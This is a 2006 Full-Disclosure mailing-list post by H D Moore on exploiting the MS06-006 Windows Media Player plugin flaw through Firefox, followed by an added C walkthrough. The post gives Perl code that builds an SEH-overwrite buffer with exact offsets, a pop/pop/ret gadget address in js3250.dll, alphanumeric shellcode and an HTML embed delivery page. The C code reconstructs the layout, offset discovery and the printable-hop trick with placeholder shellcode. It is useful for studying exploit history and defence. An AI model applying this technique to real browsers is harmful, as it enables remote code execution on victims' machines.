Message-ID: <200602161723.23818.fdlist@digitaloffense.net>
Date: Thu Feb 16 23:23:34 2006
From: fdlist at digitaloffense.net (H D Moore)
Subject: MS06-06 Windows Media Player Exploitation
Still getting some annoying crashes (SEH trick in alphanum code is
annoying when you are trying to debug something...), but the basic
solution is:
1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes
# SEH layout: 2082 = next-SEH slot ("ABC=" hop), 2086 = handler slot
# (pop/pop/ret gadget), 2090 = start of $shellcode, the alphanumeric
# payload built earlier in the module
my $pattern = Pex::Text::PatternCreate(16384);
substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2090, length($shellcode), $shellcode);
$content = "<html><body><embed src=\"$pattern.wmv\"></body></html>";
Return address is from js3250.dll in Firefox 1.5.0.1; you should
auto-target based on the browser version.
-HD
On Thursday 16 February 2006 16:26, c0ntex wrote:
> No exploit, just some basic research - anyone with 100% Ascii win32
> shellcode?
>
> http://open-security.org/winmedia/index.html
>
> --
>
> regards
> c0ntex
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
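The layout HD Moore sketches above (cyclic filler, a printable hop in the next-SEH slot, a pop/pop/ret address with no byte over 0x7F in the handler slot, alphanumeric shellcode right after it), worked through in C. This is an added example, not code from the post and not Metasploit code: the offsets 2082/2086/2090 and the gadget address 0x60082336 are taken from the message, pattern_create mimics Pex::Text::PatternCreate, the x86 length decoder covers only the opcodes a hop like "ABC=" uses, and SAMPLE_SC is a constructed alphanumeric string, not functional shellcode.

```c
/* Added example: SEH overwrite under a 7-bit / alphanumeric constraint.
 * Offsets and gadget address are from the post; SAMPLE_SC is a
 * constructed stand-in, not real shellcode. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN     16384u
#define NSEH_OFF    2082u        /* next-SEH pointer: holds the "ABC=" hop */
#define HANDLER_OFF 2086u        /* SEH handler: pop ebx; pop ebp; ret */
#define SHELL_OFF   2090u        /* shellcode starts right after the handler */
#define RET_ADDR    0x60082336u  /* gadget in js3250.dll, Firefox 1.5.0.1 (post) */

/* Constructed alphanumeric filler standing in for a real payload. */
static const char SAMPLE_SC[] = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI";

/* Cyclic filler in the style of Pex::Text::PatternCreate ("Aa0Aa1Aa2..."):
 * uppercase changes slowest, lowercase next, digit fastest, so any four
 * bytes map back to exactly one offset within 20280 bytes. */
void pattern_create(uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        size_t t = i / 3;
        if (i % 3 == 0)      buf[i] = (uint8_t)('A' + (t / 260) % 26);
        else if (i % 3 == 1) buf[i] = (uint8_t)('a' + (t / 10) % 26);
        else                 buf[i] = (uint8_t)('0' + t % 10);
    }
}

/* PatternOffset equivalent: given the 32-bit value that landed in the SEH
 * record (or a register) at crash time, find which filler offset it was. */
long pattern_offset(uint32_t seen)
{
    static uint8_t pat[BUF_LEN];
    uint8_t needle[4];
    pattern_create(pat, BUF_LEN);
    for (int i = 0; i < 4; i++) needle[i] = (uint8_t)(seen >> (8 * i));
    for (size_t off = 0; off + 4 <= BUF_LEN; off++)
        if (memcmp(pat + off, needle, 4) == 0) return (long)off;
    return -1;
}

/* Rule 2: every byte of the return address must be <= 0x7F. */
int addr_is_7bit(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xFFu) > 0x7Fu) return 0;
    return 1;
}

/* Rule 1: the payload itself must be pure alphanumeric. */
int is_alphanumeric(const uint8_t *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (!isalnum(p[i])) return 0;
    return 1;
}

/* Filler, nSEH hop, handler gadget (pack('V') byte order), shellcode.
 * Returns bytes written, or 0 if the payload does not fit. */
size_t build_layout(uint8_t *buf, size_t cap, const char *nseh,
                    const uint8_t *sc, size_t sclen)
{
    if (cap < BUF_LEN || SHELL_OFF + sclen > BUF_LEN) return 0;
    pattern_create(buf, BUF_LEN);
    memcpy(buf + NSEH_OFF, nseh, 4);
    for (int i = 0; i < 4; i++) buf[HANDLER_OFF + i] = (uint8_t)(RET_ADDR >> (8 * i));
    memcpy(buf + SHELL_OFF, sc, sclen);
    return BUF_LEN;
}

/* Length of the few opcodes a printable hop is built from; 0 ends the walk. */
static size_t insn_len(uint8_t op)
{
    if (op >= 0x40 && op <= 0x4F) return 1;   /* inc/dec r32, bytes '@'..'O' */
    if (op == 0x3D) return 5;                 /* cmp eax, imm32: '=' plus 4 bytes */
    return 0;
}

/* pop/pop/ret lands on nSEH; walk straight-line execution from there and
 * report where the CPU arrives. With "ABC=" the cmp swallows the handler
 * address, so execution falls through onto SHELL_OFF. */
size_t hop_landing(const uint8_t *buf, size_t start, size_t limit)
{
    size_t pc = start;
    while (pc < limit) {
        size_t n = insn_len(buf[pc]);
        if (n == 0) break;
        pc += n;
    }
    return pc;
}

/* Build with a given 4-byte nSEH and report where the hop ends up. */
size_t demo_landing(const char *nseh)
{
    static uint8_t buf[BUF_LEN];
    if (!build_layout(buf, sizeof buf, nseh, (const uint8_t *)SAMPLE_SC, strlen(SAMPLE_SC)))
        return 0;
    return hop_landing(buf, NSEH_OFF, SHELL_OFF);
}

/* All three of the post's rules checked on the "ABC=" layout. */
int layout_ok(void)
{
    static uint8_t buf[BUF_LEN];
    size_t sclen = strlen(SAMPLE_SC);
    if (!build_layout(buf, sizeof buf, "ABC=", (const uint8_t *)SAMPLE_SC, sclen)) return 0;
    return addr_is_7bit(RET_ADDR) && is_alphanumeric(buf + SHELL_OFF, sclen)
        && hop_landing(buf, NSEH_OFF, SHELL_OFF) == SHELL_OFF;
}

int main(void)
{
    printf("SEH value 0x72433572 came from filler offset %ld\n", pattern_offset(0x72433572u));
    printf("\"ABC=\" lands at %zu, \"ABCD\" at %zu (shellcode at %u)\n",
           demo_landing("ABC="), demo_landing("ABCD"), SHELL_OFF);
    printf("layout %s\n", layout_ok() ? "ok" : "violates a rule");
    return 0;
}
```

The point of the '=' is visible in demo_landing: 0x3D is cmp eax, imm32, so the four handler bytes at 2086 are consumed as an immediate and the CPU arrives at 2090; swap it for a fourth inc ("ABCD") and the walk stops at 2086, where it would try to execute the gadget address itself. pattern_offset is how offsets like 2086 are found in the first place: crash with the plain filler, read the value that overwrote the handler, and look it up.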